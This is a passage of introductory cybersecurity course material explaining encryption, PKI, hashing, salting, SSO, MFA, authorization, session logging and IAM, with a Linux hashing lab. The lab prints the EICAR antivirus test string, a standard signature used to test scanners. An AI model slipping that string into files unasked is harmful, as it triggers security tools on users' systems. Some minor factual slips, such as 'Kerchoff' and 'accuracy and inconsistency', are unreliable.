information security, this tactic is known as brute force attack, a trial-and-error process of
discovering private information. The other major flaw of Caesar's cipher is that it relies on a single
key. If that key was lost or stolen, there's nothing stopping someone from accessing private
information. Properly keeping track of cryptographic keys is an important part of security. To start,
it's important to ensure that these keys are not stored in public places, and to share them
separately from the information they will decrypt. Caesar's cipher is just one of many algorithms
used to protect people's privacy. Due to its limitations, we rely on more complex algorithms to
secure information online. Our next focus is exploring how modern algorithms work to keep
information private.
Public Key Infrastructure
Computers use a lot of encryption algorithms to send and store information online. They're all
helpful when it comes to hiding private information, but only as long as their keys are protected.
Can you imagine having to keep track of the encryption keys protecting all of your personal
information online? Neither can I, and we don't have to, thanks to something known as public key
infrastructure. Public key infrastructure, or PKI, is an encryption framework that secures the
exchange of information online. It's a broad system that makes accessing information fast, easy, and
secure. So, how does it all work? PKI is a two-step process. It all starts with the exchange of
encrypted information. This involves either asymmetric encryption, symmetric encryption, or both.
Asymmetric encryption involves the use of a public and private key pair for encryption and
decryption of data. Let's imagine this as a box that can be opened with two keys. One key, the public
key, can only be used to access the slot and add items to the box. Since the public key can't be used
to remove items, it can be copied and shared with people all around the world to add items. On the
other hand, the
second key, the private key, opens the box fully, so that the items inside can be removed. Only the
owner of the box has access to the private key that unlocks it. Using a public key allows the people
and servers you're communicating with to see and send you encrypted information
that only you can decrypt with your private key. This two-key system makes asymmetric
encryption a secure way to exchange information online; however, it also slows
down the process. Symmetric encryption, on the other hand, is a faster and simpler
approach to key management. Symmetric encryption involves the use of a single secret key to
exchange information. Let's imagine the locked box again. Instead of two keys, symmetric
encryption uses the same key. The owner can use it to open the box, add items, and close it again.
When they want to share access, they can give the secret key to anyone else to do the same.
Exchanging a single secret key may make web communications faster, but it also makes it less
secure. PKI uses both asymmetric and symmetric encryption, sometimes in conjunction with one
another. It all depends on whether speed or security is the priority. For example, mobile chat
applications use asymmetric encryption to establish a connection
between people at the start of a conversation when security is the priority. Afterwards, when the
speed of communications back-and-forth is the priority, symmetric encryption takes over. While
both have their own strengths and weaknesses, they share a common vulnerability, establishing
trust between the sender and receiver. Both processes rely on sharing keys that can be misused,
lost, or stolen. This isn't a problem when we exchange information in person because we can use
our senses to tell the difference between those we trust and those we don't trust. Computers, on the
other hand, aren't naturally equipped to make this distinction. That's where the second step of PKI
applies. PKI addresses the vulnerability of key sharing by establishing trust using a system of digital
certificates between computers and networks. A digital certificate is a file that verifies the identity of
a public key holder. Most online information is exchanged using digital certificates. Users,
companies, and networks hold one and exchange them when communicating information online as
a way of signaling trust. Let's look at an example of how digital certificates are created. Let's say an
online business is about to launch their website, and they want to obtain a digital certificate. When
they register their domain, the hosting company sends certain information over to a trusted
certificate authority, or CA. The information provided is usually basic things like the company name
and the country where its headquarters are located. A public key for the site is also provided. The
certificate authority then uses this data to verify the company's identity. When it's confirmed, the
CA encrypts the data with its own private key. Finally, they create a digital certificate that contains
the encrypted company data. It also contains CA's digital signature to prove that it's authentic.
Digital certificates are a lot like a digital ID badge that's used online to restrict or grant access to
information. This is how PKI solves the trust issue. Combined with asymmetric and symmetric
encryption, this two-step approach to exchanging secure information between trusted sources is
what makes PKI such a useful security control.
Symmetric and asymmetric encryption
Previously, you learned these terms:
●
●
●
Encryption: the process of converting data from a readable format to an encoded format
Public key infrastructure (PKI): an encryption framework that secures the exchange of online
information
Cipher: an algorithm that encrypts information
All digital information deserves to be kept private, safe, and secure. Encryption is one key to doing that!
It is useful for transforming information into a form that unintended recipients cannot understand. In
this reading, you’ll compare symmetric and asymmetric encryption and learn about some well-known
algorithms for each.
Types of encryption
There are two main types of encryption:
●
●
Symmetric encryption is the use of a single secret key to exchange information. Because it uses
one key for encryption and decryption, the sender and receiver must know the secret key to lock
or unlock the cipher.
Asymmetric encryption is the use of a public and private key pair for encryption and decryption
of data. It uses two separate keys: a public key and a private key. The public key is used to
encrypt data, and the private key decrypts it. The private key is only given to users with
authorized access.
The importance of key length
Ciphers are vulnerable to brute force attacks, which use a trial and error process to discover private
information. This tactic is the digital equivalent of trying every number in a combination lock trying to
find the right one. In modern encryption, longer key lengths are considered to be more secure. Longer
key lengths mean more possibilities that an attacker needs to try to unlock a cipher.
One drawback to having long encryption keys is slower processing times. Although short key lengths are
generally less secure, they’re much faster to compute. Providing fast data communication online while
keeping information safe is a delicate balancing act.
Approved algorithms
Many web applications use a combination of symmetric and asymmetric encryption. This is how they
balance user experience with safeguarding information. As an analyst, you should be aware of the most
widely-used algorithms.
Symmetric algorithms
●
●
Triple DES (3DES) is known as a block cipher because of the way it converts plaintext into
ciphertext in “blocks.” Its origins trace back to the Data Encryption Standard (DES), which was
developed in the early 1970s. DES was one of the earliest symmetric encryption algorithms that
generated 64-bit keys. A bit is the smallest unit of data measurement on a computer. As you
might imagine, Triple DES generates keys that are 192 bits, or three times as long. Despite the
longer keys, many organizations are moving away from using Triple DES due to limitations on
the amount of data that can be encrypted. However, Triple DES is likely to remain in use for
backwards compatibility purposes.
Advanced Encryption Standard (AES) is one of the most secure symmetric algorithms today.
AES generates keys that are 128, 192, or 256 bits. Cryptographic keys of this size are considered
to be safe from brute force attacks. It’s estimated that brute forcing an AES 128-bit key could
take a modern computer billions of years!
Asymmetric algorithms
●
●
Rivest Shamir Adleman (RSA) is named after its three creators who developed it while at the
Massachusetts Institute of Technology (MIT). RSA is one of the first asymmetric encryption
algorithms that produces a public and private key pair. Asymmetric algorithms like RSA produce
even longer key lengths. In part, this is due to the fact that these functions are creating two keys.
RSA key sizes are 1,024, 2,048, or 4,096 bits. RSA is mainly used to protect highly sensitive data.
Digital Signature Algorithm (DSA) is a standard asymmetric algorithm that was introduced by
NIST in the early 1990s. DSA also generates key lengths of 2,048 bits. This algorithm is widely
used today as a complement to RSA in public key infrastructure.
Generating keys
These algorithms must be implemented when an organization chooses one to protect their data. One
way this is done is using OpenSSL, which is an open-source command line tool that can be used to
generate public and private keys. OpenSSL is commonly used by computers to verify digital certificates
that are exchanged as part of public key infrastructure.
Note: OpenSSL is just one option. There are various others available that can generate keys with any of
these common algorithms.
In early 2014, OpenSSL disclosed a vulnerability, known as the Heartbleed bug, that exposed sensitive
data in the memory of websites and applications. Although unpatched versions of OpenSSL are still
available, the Heartbleed bug was patched later that year (2014). Many businesses today use the secure
versions of OpenSSL to generate public and private keys, demonstrating the importance of using up-todate software.
Obscurity is not security
In the world of cryptography, a cipher must be proven to be unbreakable before claiming that it is
secure. According to Kerchoff’s principle, cryptography should be designed in such a way that all the
details of an algorithm—except for the private key—should be knowable without sacrificing its security.
For example, you can access all the details about how AES encryption works online and yet it is still
unbreakable.
Occasionally, organizations implement their own, custom encryption algorithms. There have been
instances where those secret cryptographic systems have been quickly cracked after being made public.
Pro tip: A cryptographic system should not be considered secure if it requires secrecy around how it
works.
Encryption is everywhere
Companies use both symmetric and asymmetric encryption. They often work as a team, balancing
security with user experience.
For example, websites tend to use asymmetric encryption to secure small blocks of data that are
important. Usernames and passwords are often secured with asymmetric encryption while processing
login requests. Once a user gains access, the rest of their web session often switches to using symmetric
encryption for its speed.
Using data encryption like this is increasingly required by law. Regulations like the Federal Information
Processing Standards (FIPS 140-3) and the General Data Protection Regulation (GDPR) outline how data
should be collected, used, and handled. Achieving compliance with either regulation is critical to
demonstrating to business partners and governments that customer data is handled responsibly.
Key takeaways
Knowing the basics of encryption is important for all security professionals. Symmetric encryption relies
on a single secret key to protect data. On the other hand, asymmetric uses a public and private key pair.
Their encryption algorithms create different key sizes. Both types of encryption are used to meet
compliance regulations and protect data online.
Activity: Decrypt an encrypted message
Introduction
In this lab, you'll complete a series of tasks to obtain instructions for decrypting an encrypted file.
Encryption of data in use, at rest, and in transit is critical to security functions. You'lll use the Linux skills
you have learned to uncover the clues needed to decode a classical cipher, restore a file, and reveal a
hidden message.
What you’ll do
You have multiple tasks in this lab:
●
●
●
●
List the contents of a directory
Read the contents of files
Use Linux commands to revert a classical cipher back to plaintext
Decrypt an encrypted file and restore the file to its original state
Non-repudiation and hashing
Security professionals are always thinking about vulnerabilities. It's how we stay ahead of threats.
We've spent some time together exploring a couple forms of encryption. The two types we've
discussed produce keys that are shared when communicating information. Encryption keys are
vulnerable to being lost or stolen, which can lead to sensitive
information at risk. Let's explore another security control that helps companies address this
weakness. A hash function is an algorithm that produces a code that can't be decrypted. Unlike
asymmetric and symmetric algorithms, hash functions are one-way processes
that do not generate decryption keys. Instead, these algorithms produce a unique
identifier known as a hash value, or digest. Here's an example to demonstrate this. Imagine a
company has an internal application that is used by employees and is stored in a shared drive. After
passing through a hashing function, the program receives its hash value. For example purposes, we
created this relatively short hash value with the MD5 hashing function. Generally, standard hash
functions that produce longer hashes are preferred for being more secure. Next, let's imagine an
attacker replaces the program with a modified version that performs malicious actions. The
malicious program may work like the original. However, if so much as one line of
code is different from the original, it will produce a different hash value. By comparing the hash
values, we can validate that the programs are different. Attackers use tricks like this often
because they're easily overlooked. Fortunately, hash values help us identify when something like
this is happening. In security, hashes are primarily used to determine the integrity of files and
applications. Data integrity relates to the accuracy and inconsistency of information. This is known
as non-repudiation, the concept that authenticity of information can't be denied. Hash functions are
important security controls that make proven data integrity possible. Analysts use them frequently.
One way to do this is by finding the hash value of files or applications and comparing them against
known malicious files. For example, we can use the Linux command
line to generate the hash value for any file on your computer. We just launch a shell and type the
name of the hashing algorithm we want to use. In this case, we're using
a common one known as sha256. Next, we need to enter the file
name of any file we want to hash. Let's hash the contents of newfile.txt. Now, we'll press Enter. The
terminal generates this
unique hash value for the file. These tools can be compared with
the hash values of known online viruses. One such database is VirusTotal. This is a popular tool
among security
practitioners that's useful for analyzing suspicious files, domains,
IPs, and URLs. As we've explored, even the slightest
change in input results in a totally different hash value. Hash functions are intentionally designed
this way to assist with matters of non-repudiation. They equip computers with a quick and
easy way to compare input and output values and validate data integrity.
The evolution of hash functions
Hash functions are important controls that are part of every company's security strategy. Hashing is
widely used for authentication and non-repudiation, the concept that the authenticity of information
can’t be denied.
Previously, you learned that hash functions are algorithms that produce a code that can't be decrypted.
Hash functions convert information into a unique value that can then be used to determine its integrity.
In this reading, you’ll learn about the origins of hash functions and how they’ve changed over time.
Origins of hashing
Hash functions have been around since the early days of computing. They were originally created as a
way to quickly search for data. Since the beginning, these algorithms have been designed to represent
data of any size as small, fixed-size values, or digests. Using a hash table, which is a data structure that's
used to store and reference hash values, these small values became a more secure and efficient way for
computers to reference data.
One of the earliest hash functions is Message Digest 5, more commonly known as MD5. Professor Ronald
Rivest of the Massachusetts Institute of Technology (MIT) developed MD5 in the early 1990s as a way to
verify that a file sent over a network matched its source file.
Whether it’s used to convert a single email or the source code of an application, MD5 works by
converting data into a 128-bit value. You might recall that a bit is the smallest unit of data measurement
on a computer. Bits can either be a 0 or 1. In a computer, bits represent user input in a way that
computers can interpret. In a hash table, this appears as a string of 32 characters. Altering anything in
the source file generates an entirely new hash value.
Generally, the longer the hash value, the more secure it is. It wasn’t long after MD5's creation that
security practitioners discovered 128-bit digests resulted in a major vulnerability.
Here is an example of how plaintext gets turned into hash values:
Hash collisions
One of the flaws in MD5 happens to be a characteristic of all hash functions. Hash algorithms map any
input, regardless of its length, into a fixed-size value of letters and numbers. What’s the problem with
that? Although there are an infinite amount of possible inputs, there’s only a finite set of available
outputs!
MD5 values are limited to 32 characters in length. Due to the limited output size, the algorithm is
considered to be vulnerable to hash collision, an instance when different inputs produce the same hash
value. Because hashes are used for authentication, a hash collision is similar to copying someone’s
identity. Attackers can carry out collision attacks to fraudulently impersonate authentic data.
Next-generation hashing
To avoid the risk of hash collisions, functions that generated longer values were needed. MD5's
shortcomings gave way to a new group of functions known as the Secure Hashing Algorithms, or SHAs.
The National Institute of Standards and Technology (NIST) approves each of these algorithms. Numbers
besides each SHA function indicate the size of its hash value in bits. Except for SHA-1, which produces a
160-bit digest, these algorithms are considered to be collision-resistant. However, that doesn’t make
them invulnerable to other exploits.
Five functions make up the SHA family of algorithms:
●
●
●
●
●
SHA-1
SHA-224
SHA-256
SHA-384
SHA-512
Secure password storage
Passwords are typically stored in a database where they are mapped to a username. The server receives
a request for authentication that contains the credentials supplied by the user. It then looks up the
username in the database and compares it with the password that was provided and verifies that it
matches before granting them access.
This is a safe system unless an attacker gains access to the user database. If passwords are stored in
plaintext, then an attacker can steal that information and use it to access company resources. Hashing
adds an additional layer of security. Because hash values can't be reversed, an attacker would not be
able to steal someone's login credentials if they managed to gain access to the database.
Rainbow tables
A rainbow table is a file of pre-generated hash values and their associated plaintext. They’re like
dictionaries of weak passwords. Attackers capable of obtaining an organization’s password database can
use a rainbow table to compare them against all possible values.
Adding some “salt”
Functions with larger digests are less vulnerable to collision and rainbow table attacks. But as you’re
learning, no security control is perfect.
Salting is an additional safeguard that's used to strengthen hash functions. A salt is a random string of
characters that's added to data before it's hashed. The additional characters produce a more unique
hash value, making salted data resilient to rainbow table attacks.
For example, a database containing passwords might have several hashed entries for the password
"password." If those passwords were all salted, each entry would be completely different. That means an
attacker using a rainbow table would be unable to find matching values for "password" in the database.
For this reason, salting has become increasingly common when storing passwords and other types of
sensitive data. The length and uniqueness of a salt is important. Similar to hash values, the longer and
more complex a salt is, the harder it is to crack.
Key takeaways
Security professionals often use hashing as a tool to validate the integrity of program files, documents,
and other types of data. Another way it’s used is to reduce the chances of a data breach. As you’ve
learned, not all hashing functions provide the same level of protection. Rainbow table attacks are more
likely to work against algorithms that generate shorter keys, like MD5. Many small- and medium-sized
businesses still rely on MD5 to secure sensitive data. Knowing about alternative algorithms and salting
better prepares you to make impactful security recommendations.
Activity: Create hash values
Introduction
In this lab, you'll create and evaluate the hash values for two files. You will use Linux commands to
calculate the hash of two files and observe any differences in the hashes produced. Then, you'll
determine if the files are the same, or different.
What you’ll do
You have multiple tasks in this lab:
●
●
●
●
List the contents of the home directory
Compare the plain text of the two files presented for hashing
Compute the sha256sum hash of the two separate files
Compare the hashes provided to identify the differences
Task 1. Generate hashes for files
The lab starts in your home directory, /home/analyst, as the current working directory.
This directory contains two files file1.txt and file2.txt, which contain different data.
In this task, you need to display the contents of each of these files. You’ll then generate a
hash value for each of these files and send the values to new files, which you’ll use to
examine the differences in these values later.
1. Use the ls command to list the contents of the directory.
Two files, file1.txt and file2.txt, are listed.
2. Use the cat command to display the contents of the file1.txt file:
cat file1.txt
Copied!
content_copy
Note: If you enter a command incorrectly and it fails to return to the command-line prompt, you can
press CTRL+C to stop the process and force the shell to return to the command-line prompt.
3. Use the cat command to display the contents of the file2.txt file:
cat file2.txt
Copied!
content_copy
4. Review the output of the two file contents:
5. analyst@4fb6d613b6b0:-$ cat file1.txt
6. X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
7. analyst@4fb6d613b6b0:-$ cat file2.txt
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
5. Use the sha256sum command to generate the hash of the file1.txt file:
sha256sum file1.txt
You now need to follow the same step for the file2.txt file.
6. Use the sha256sum command to generate the hash of the file2.txt file:
sha256sum file2.txt
Copied!
content_copy
7. Review the generated hashes of the contents of the two files:
8. analyst@4fb6d613b6b0:-$ sha256sum file1.txt
9. 131f95c51cc819465fa1797f6ccacf9d494aaaff46fa3eac73ae63ffbdfd8267 file1.txt
10. analyst@4fb6d613b6b0:-$ sha256sum file2.txt
2558ba9a4cad1e69804ce03aa2a029526179a91a5e38cb723320e83af9ca017b file2.txt
You have completed this task and used the sha256sum command to generate hash values
for the file1.txt and file2.txt files.
Generate hashes for files
Task 2. Compare hashes
In this task, you’ll write the hashes to two separate files and then compare them to find the
difference.
1. Use the sha256sum command to generate the hash of the file1.txt file, and send the output
to a new file called file1hash:
sha256sum file1.txt >> file1hash
You now need to complete the same step for the file2.txt file.
2. Use the sha256sum command to generate the hash of the file2.txt file, and send the output
to a new file called file2hash:
sha256sum file2.txt >> file2hash
Now, you should have two hashes written to separate files. The first hash was written to
the file1hash file, and the second hash was written to the file2hash file.
You can manually display and compare the differences.
3. Use the cat command to display the hash values in the file1hash and file2hash files.
4. Inspect the output and note the difference in the hash values.
Note: Although the content in file1.txt and file2.txt previously appeared identical, the hashes
written to the file1hash and file2hash files are completely different.
Now, you can use the cmp command to compare the two files byte by byte. If a difference is
found, the command reports the byte and line number where the first difference is found.
5. Use the cmp command to highlight the differences in the file1hash and file2hash files:
cmp file1hash file2hash
Copied!
content_copy
6. Review the output, which reports the first difference between the two files:
analyst@4fb6d613b6b0:-$ cmp file1hash file2hash
file1hash file2hash differ: char1, line 1
Note: The output of the cmp command indicates that the hashes differ at the first character in the
first line.
Access controls and authentication systems
Protecting data is a fundamental feature of security controls. When it comes to keeping information
safe and secure, hashing and encryption are powerful, yet limited tools. Managing who or what has
access to information is also key to safeguarding information. The next series of controls that we'll
be exploring are access controls, the security controls that
manage access, authorization, and accountability of information. When done well, access controls
maintain data confidentiality, integrity, and availability. They also get users
the information they need quickly. These systems are commonly broken down
into three separate, yet related functions known as the authentication,
authorization, and accounting framework. Each control has its own protocol and
systems that make them work. In this video, let's get comfortable with the basics of the first one on
the list, authentication. Authentication systems are access controls that serve a very basic purpose.
They ask anything attempting to access information this simple question: who are you?
Organizations go about collecting answers to these questions differently, depending on the
objectives of their security policy. Some are more thorough than others,
but in general, responses to this question can be based on three factors of authentication. The first
is knowledge. Authentication by knowledge refers to something the user knows, like a password or
the answer to a security question they provided previously. Another factor is ownership, referring to
something the user possesses. A commonly used type of authentication by ownership is a one-time
passcode, or OTP. You've probably experienced
these at one time or another. They're a random number sequence that an application or website
will send you via text or email and ask you to provide. Last is characteristic. Authentication
by this factor is something the user is. Biometrics, like fingerprint scans on your
smartphone, are example of this type of authentication. While not used everywhere, this form of
authentication is becoming more common because it's much tougher for
criminals to impersonate someone if they have to mimic a fingerprint or facial scan as opposed to a
password. The information provided during authentication needs to match the information on file
for these access controls to work. When the credentials don't match,
authentication fails and access is denied. When they match, access is granted. Incorrectly denying
access can be frustrating to anyone. To make access systems more convenient, many organizations
these days rely on single sign-on. Single sign-on, or SSO, is a technology that combines several
different logins into one. Can you imagine having to reintroduce
yourself every time you meet up with a friend? That's exactly the sort of problem SSO solves.
Instead of requiring users to authenticate repeatedly, SSO establishes their identity once, allowing
them to gain access to company resources faster. While SSO systems are helpful when it comes to
speeding up the authentication process, they present a significant
vulnerability when used alone. Denying access to authorized users can be frustrating, but you know
what's even worse? Incorrectly granting access to the wrong user. SSO technology is great, but not if
it relies on just a single factor of authentication. Adding more authentication
factors strengthen these systems. Multi-factor authentication, or MFA, is a security measure, which
requires a user to verify their identity in two or more ways to access a system or network. MFA
combines two or more independent credentials, like knowledge and ownership, to prove that
someone is who they claim to be. SSO and MFA are often used in
conjunction with one another to layer the defense capabilities of authentication systems. When
both are used, organizations can ensure convenient access that is also secure. Now that we covered
authentication, we're ready to explore the second part of the framework.
The rise of SSO and MFA
Most companies help keep their data safely locked up behind authentication systems. Usernames and
passwords are the keys that unlock information for most organizations. But are those credentials
enough? Information security often focuses on managing a user's access of, and authorization to,
information.
Previously, you learned about the three factors of authentication: knowledge, ownership, and
characteristic. Single sign-on (SSO) and multi-factor authentication (MFA) are two technologies that
have become popular for implementing these authentication factors. In this reading, you’ll learn how
these technologies work and why companies are adopting them.
A better approach to authentication
Single sign-on (SSO) is a technology that combines several different logins into one. More companies are
turning to SSO as a solution to their authentication needs for three reasons:
1. SSO improves the user experience by eliminating the number of usernames and passwords
people have to remember.
2. Companies can lower costs by streamlining how they manage connected services.
3. SSO improves overall security by reducing the number of access points attackers can target.
This technology became available in the mid-1990s as a way to combat password fatigue, which refers
to people’s tendency to reuse passwords across services. Remembering many different passwords can
be a challenge, but using the same password repeatedly is a major security risk. SSO solves this dilemma
by shifting the burden of authentication away from the user.
How SSO works
SSO works by automating how trust is established between a user and a service provider. Rather than
placing the responsibility on an employee or customer, SSO solutions use trusted third-parties to prove
that a user is who they claim to be. This is done through the exchange of encrypted access tokens
between the identity provider and the service provider.
Similar to other kinds of digital information, these access tokens are exchanged using specific protocols.
SSO implementations commonly rely on two different authentication protocols: LDAP and SAML. LDAP,
which stands for Lightweight Directory Access Protocol, is mostly used to transmit information onpremises; SAML, which stands for Security Assertion Markup Language, is mostly used to transmit
information off-premises, like in the cloud.
Note: LDAP and SAML protocols are often used together.
Here's an example of how SSO can connect a user to multiple applications with one access token:
Limitations of SSO
Usernames and passwords alone are not always the most secure way of protecting sensitive
information. SSO provides useful benefits, but there’s still the risk associated with using one form of
authentication. For example, a lost or stolen password could expose information across multiple
services. Thankfully, there’s a solution to this problem.
MFA to the rescue
Multi-factor authentication (MFA) requires a user to verify their identity in two or more ways to access a
system or network. In a sense, MFA is similar to using an ATM to withdraw money from your bank
account. First, you insert a debit card into the machine as one form of identification. Then, you enter
your PIN number as a second form of identification. Combined, both steps, or factors, are used to verify
your identity before authorizing you to access the account.
Strengthening authentication
MFA builds on the benefits of SSO. It works by having users prove that they are who they claim to be.
The user must provide two factors (2FA) or three factors (3FA) to authenticate their identification. The
MFA process asks users to provide these proofs, such as:
●
●
●
Something a user knows: most commonly a username and password
Something a user has: normally received from a service provider, like a one-time passcode (OTP)
sent via SMS
Something a user is: refers to physical characteristics of a user, like their fingerprints or facial
scans
Requiring multiple forms of identification is an effective security measure, especially in cloud
environments. It can be difficult for businesses in the cloud to ensure that the users remotely accessing
their systems are not threat actors. MFA can reduce the risk of authenticating the wrong users by
requiring forms of identification that are difficult to imitate or brute force.
Key takeaways
Implementing both SSO and MFA security controls improves security without sacrificing the user
experience. Relying on passwords alone is a serious vulnerability. Implementing SSO means fewer
points of entry, but that’s not enough. Combining SSO and MFA can be an effective way to protect
information, so that users have a streamlined experience while unauthorized people are kept away from
important information.
The Mechanisms of Authorization
Access is as much about authorization as it is about authentication. One of the most
important functions of access controls is how they assign responsibility for
certain systems and processes. Next up in our exploration of access control systems are the
mechanisms of authorization. These protocols actually work closely together with authentication
technologies. While one validates who the user is, the other determines what
they're allowed to do. Let's take a look at the next part of the authentication, authorization, and
accounting framework that protects private information. Earlier, we learned about the principle of
least privilege. Authorization is linked to the idea that access to information only
lasts as long as needed. Authorization systems are also heavily influenced by this idea in addition to
another important security principle, the separation of duties. Separation of duties is the principle
that users should not be given levels of authorization that will allow them to misuse a system.
Separating duties reduces the risk of system failures and inappropriate behavior from users. For
example, a person responsible for providing customer service shouldn't also be authorized to rate
their own performance. In this position, they could easily neglect their duties while continuing to
give themselves high marks with no oversight. Similarly, if one person was authorized to develop
and test a security system, they are much more likely to be unaware of its weaknesses. Both the
principle of least privilege and the concept of separating duties apply to more than just people.
They apply to all systems including networks, databases, processes, and any other aspect of an
organization. Ultimately, authorization depends on a system or user's role. When it comes to
securing data over a network, there are a couple of frequently used access controls that you should
be familiar with: HTTP basic auth and OAuth. Have you ever wondered what the HTTP in web
addresses stood for. It stands for hypertext transfer protocol, which is how communications are
established over network. HTTP uses what is known as basic auth, the technology used to establish a
user's request to access a server. Basic auth works by sending an identifier every time a user
communicates with a web page. Some websites still use basic auth to tell whether someone is
authorized to access information on that site. However, their protocol is vulnerable to attacks
because it transmits usernames and password openly over the network. Most websites today use
HTTPS instead, which stands for hypertext transfer protocol secure. This protocol doesn't expose
sensitive information, like access credentials, when communicating over the network. Another
secure authentication technology used today is OAuth. OAuth is an open-standard authorization
protocol that shares designated access between applications. For example, you can
tell Google that it's okay for another website to access your profile to create an account. Instead of
requesting and sending sensitive usernames and passwords over the network, OAuth uses API
tokens to verify access between you and a service provider. An API token is a small block of
encrypted code that contains information about a user. These tokens contain things like your
identity, site permissions, and more. OAuth sends and receives access requests using API tokens by
passing them from a server to a user's device. Let's explore what's going on behind the scenes.
When you authorize a site to create an account using your Google profile, all of Google's usual login
protocols are still active. If you have multi-factor authentication enabled on your account, and you
should, you'll still have the security benefits that it provides. API tokens minimize risks in a major
way. These API tokens serve as an additional layer of encryption that helps to keep your Google
password safe in the event of a breach on another platform. Basic auth and OAuth are just a couple
of examples of authorization tools that are designed with
the principles of least privilege and separation of duty in mind. There are many other
controls that help limit the risk of unauthorized access to information. In addition to
controlling access, it's also important to monitor it.
Here's a simple breakdown of how API tokens work:
1. Authentication: When you want to use an API (Application Programming Interface)
to access certain features or data from a service (e.g., a social media platform, a
payment gateway, or a cloud storage service), you typically need permission. API
tokens are used to prove that you have the right to access that service.
2. Generation: To get an API token, you usually need to create an account with the
service provider. Once you're logged in, you can request an API token through their
developer or settings portal.
3. Protection: API tokens are sensitive pieces of information, much like a password.
They should be kept secret to prevent unauthorized access. Service providers often
use encryption to protect these tokens when they're transmitted over the internet.
4. Usage: When you make a request to the API, you include your API token in the
request header or as a parameter. This token tells the server which account or
application is making the request and what level of access it has.
5. Authorization: The server checks the API token to see if it's valid and if the client has
permission to perform the requested action. If everything checks out, the server will
respond to the client's request, providing the requested data or performing the
requested action.
6. Revocation: If you no longer want a particular program or service to access your
account's data through the API, you can usually revoke or delete the associated API
token. This will prevent further access.
API tokens are a fundamental part of modern software development because they allow
different services and applications to work together securely. They are commonly used in
web and mobile app development, allowing third-party developers to integrate with
various platforms and services while maintaining security and control.
Why we audit user activity
Have you ever wondered if your employer is keeping a record of when you log into
company systems? Well, they are, if they're implementing the third and final function
of the authentication, authorization, and accounting framework. Accounting is the practice of
monitoring the access logs of a system. These logs contain information like who accessed the
system, and when they accessed it, and what resources they used. Security analysts use access logs
a lot. The data they contain is a helpful way to identify trends, like failed login attempts. They're
also used to uncover hackers who have gained access to a system, and for detecting an incident, like
a data breach. In this field, access logs are essential. Oftentimes, analyzing them is the first
procedure you'll follow when investigating a security event. So, how do access logs compile all this
useful information? Let's examine this more closely. Anytime a user accesses a system, they initiate
what's called a session. A session is a sequence
of network HTTP basic auth requests and responses associated with the same user, like when you
visit a website. Access logs are essentially records of sessions that capture the moment a user
enters a system until the moment they leave it. Two actions are triggered when the session begins.
The first is the creation of a session ID. A session ID is a unique token that identifies a user and their
device while accessing the system. Session IDs are attached to the user until they either close their
browser or the session times out. The second action that takes place at the start of a session is an
exchange of session cookies between a server and a user's device. A session cookie is a token that
websites use to validate a session and determine how long that session should last. When cookies are
exchanged between your computer and a server, your session ID is read to determine what
information the website should show you. Cookies make web sessions safer and more efficient. The
exchange of tokens means that no sensitive information, like usernames and passwords, are shared.
Session cookies prevent attackers from obtaining sensitive data. However, there's other damage
that they can do. With a stolen cookie, an attacker can impersonate a user using their session token.
This kind of attack is known as session hijacking. Session hijacking
is an event when attackers obtain a legitimate user's session ID. During these kinds of attacks, cyber
criminals impersonate the user, causing all sorts of harm. Money or private
data can be stolen. If, for example, hijackers obtain a single sign-on credential from stolen cookies,
they can even gain access to additional systems that otherwise seem secure. This is one reason why
accounting and monitoring session logs is so important. Unusual activity on access logs can be an
indication that information has been improperly accessed or stolen. At the end of the day,
accounting is how we gain valuable insight that makes information safer.
Identity and access management
Security is more than simply combining processes and technologies to protect assets. Instead, security is
about ensuring that these processes and technologies are creating a secure environment that supports a
defense strategy. A key to doing this is implementing two fundamental security principles that limit
access to organizational resources:
●
●
The principle of least privilege in which a user is only granted the minimum level of access and
authorization required to complete a task or function.
Separation of duties, which is the principle that users should not be given levels of authorization
that would allow them to misuse a system.
Both principles typically support each other. For example, according to least privilege, a person who
needs permission to approve purchases from the IT department shouldn't have the permission to
approve purchases from every department. Likewise, according to separation of duties, the person who
can approve purchases from the IT department should be different from the person who can input new
purchases.
In other words, least privilege limits the access that an individual receives, while separation of duties
divides responsibilities among multiple people to prevent any one person from having too much control.
Note: Separation of duties is sometimes referred to as segregation of duties.
Previously, you learned about the authentication, authorization, and accounting (AAA) framework. Many
businesses used this model to implement these two security principles and manage user access. In this
reading, you’ll learn about the other major framework for managing user access, identity and access
management (IAM). You will learn about the similarities between AAA and IAM and how they're
commonly implemented.
Identity and access management (IAM)
As organizations become more reliant on technology, regulatory agencies have put more pressure on
them to demonstrate that they’re doing everything they can to prevent threats. Identity and access
management (IAM) is a collection of processes and technologies that helps organizations manage digital
identities in their environment. Both AAA and IAM systems are designed to authenticate users,
determine their access privileges, and track their activities within a system.
Either model used by your organization is more than a single, clearly defined system. They each consist
of a collection of security controls that ensure the right user is granted access to the right resources at
the right time and for the right reasons. Each of those four factors is determined by your organization's
policies and processes.
Note: A user can either be a person, a device, or software.
Authenticating users
To ensure the right user is attempting to access a resource requires some form of proof that the user is
who they claim to be. In a video on authentication controls, you learned that there are a few factors that
can be used to authenticate a user:
●
●
●
Knowledge, or something the user knows
Ownership, or something the user possesses
Characteristic, or something the user is
Authentication is mainly verified with login credentials. Single sign-on (SSO), a technology that combines
several different logins into one, and multi-factor authentication (MFA), a security measure that requires
a user to verify their identity in two or more ways to access a system or network, are other tools that
organizations use to authenticate individuals and systems.
Pro tip: Another way to remember this authentication model is: something you know, something you
have, and something you are.
User provisioning
Back-end systems need to be able to verify whether the information provided by a user is accurate. To
accomplish this, users must be properly provisioned. User provisioning is the process of creating and
maintaining a user's digital identity. For example, a college might create a new user account when a new
instructor is hired. The new account will be configured to provide access to instructor-only resources
while they are teaching. Security analysts are routinely involved with provisioning users and their
access privileges.
Pro tip: Another role analysts have in IAM is to deprovision users. This is an important practice that
removes a user's access rights when they should no longer have them.
Granting authorization
If the right user has been authenticated, the network should ensure the right resources are made
available. There are three common frameworks that organizations use to handle this step of IAM:
●
●
●
Mandatory access control (MAC)
Discretionary access control (DAC)
Role-based access control (RBAC)
Mandatory Access Control (MAC)
MAC is the strictest of the three frameworks. Authorization in this model is based on a strict need-toknow basis. Access to information must be granted manually by a central authority or system
administrator. For example, MAC is commonly applied in law enforcement, military, and other
government agencies where users must request access through a chain of command. MAC is also known
as non-discretionary control because access isn’t given at the discretion of the data owner.
Discretionary Access Control (DAC)
